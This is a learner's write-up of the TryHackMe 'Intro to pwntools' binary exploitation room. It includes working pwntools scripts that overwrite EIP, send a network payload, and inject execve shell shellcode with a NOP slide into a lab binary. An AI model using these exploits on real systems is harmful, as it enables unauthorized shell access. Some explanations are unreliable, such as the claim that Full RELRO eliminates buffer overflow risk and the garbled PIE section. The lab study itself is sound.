https://tryhackme.com/room/introtopwntools
So I’m connected with ssh on the box:
Checksec
- Does Intro2pwn1 have FULL RELRO
Full RELRO makes the entire GOT read-only which removes the ability to perform a “GOT overwrite” attack, where the GOT address of a function is overwritten with the location of another function or a ROP gadget an attacker wants to run.
So it’s more secure and eliminate the risk of buffer overflows.
https://ctf101.org/binary-exploitation/relocation-read-only/
checksec intro2pwn1
YES
- Does Intro2pwn1 have RWX segments
RWX: Tells us, if the binary has segments
We don’t see it in the output of checksec.
NO
- Does Intro2pwn2 have a stack canary
Stack canaries are tokens placed after a stack to detect a stack overflow.
This allows the program to detect a buffer overflow and shut down.
NO
- Does Intro2pwn2 not have PIE
PIE stands for Position Independent Executable.
This loads the program dependencies into random locations
Exemple without PIE:
He create a shared library
$ cc -fpic -shared -I. -nostdlib
-nodefaultlibs
-o libnotc.so
os/syscall.x86_64.s
os/syscall.c
not/strlen.c
not/puts.cThen recompile it
$ cc -nostdlib -nodefaultlibs -I.
-o dynamic-example
os/start.x86_64.s
main.c -L. -lnotc
- Cause a buffer overflow on intro2pwn1 by inputting a long string such as AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA. What was detected?
A stack buffer overflow can be caused deliberately as part of an attack known as stack smashing. it’s mean you can use it to gain acess on a machine
- Now cause a buffer overflow on intro2pwn2. What error do you get?
so, if there is no stack smashing, can i use it to gain acess on the mavhine ?
cyclic
In this chapter we learn to do a bufferoverflow when the canary protection is missing.
you can see that with checksec.
We alsolern how to convert from hex to ascii, and acsii to hex.
With gdb you can locate the function print_flag() like this.
info function
Or like this:
print& print_flag
Then in a python script we have to change the value of eip:
from pwn import *
padding = cyclic(100)
padding = cyclic(cyclic_find('jaaa'))
#eip = p32(0xdeadbeef)
eip = p32(0x8048536)
payload = padding + eip
print(payload)The output of payload should be printed in a file to be used later:
python pwn_cyclic.py > attackin this file it’s looking like this:aaaabaaacaaadaaaeaaafaaagaaahaaaiaaa6
Networking
Dear buzz,
I'm running a service on port 1337, which has an overflow vulnerability.
I've left you a version that will run on port 1336 so that you can develop
your exploit.
Sincerely,
dizmas
So we have a copy of the service on the port 1336 of the service on the port 1337.
In this exemple we don’t have to change the payload or add nops, it’s just to show how to use the network.
from pwn import *
connect = remote('127.0.0.1', 1337)
print(connect.recvn(18))
payload = "A"*32
payload += p32(0xdeadbeef)
connect.send(payload)
print(connect.recvn(34))Shellcraft
For this challenge we nee d to disable ASLR (address space layout randomization).
This randomise where in memory the executable is loaded, so if we found the location of a function, the next time we run it the function will be somewhere else.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_spaceok, we don’t have the right to do it.
use the script instead.
sudo ./disable_aslr.sh
Let’s find the EIP, I’m creating a string with cyclic 100, then I open the program with gdb an past the string.
The EIP is at taaa
So I have to print 77*”A” and rest for the EIP.
Now we gonna use a python script:
from pwn import *
padding = cyclic(cyclic_find('taaa'))
eip = p32(0xffffd480+200)
nop_slide = "\x90"*1000
shellcode = "\xcc"
payload = padding + eip + nop_slide + shellcode
print(payload)I put the output in the file payload:
Now let’s create the shellcode wih shellcraft.
shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f a
from pwn import *
proc = process('./intro2pwnFinal')
padding = cyclic(cyclic_find('taaa'))
eip = p32(0xffffd510+200)
nop_slide = "\x90"*1000
shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"
#shellcode = "\xcc"
payload = padding + eip + nop_slide + shellcode
proc.send(payload)
proc.interactive()My EIP was wrong, didn’t say the value 0xffffd510 in gdb.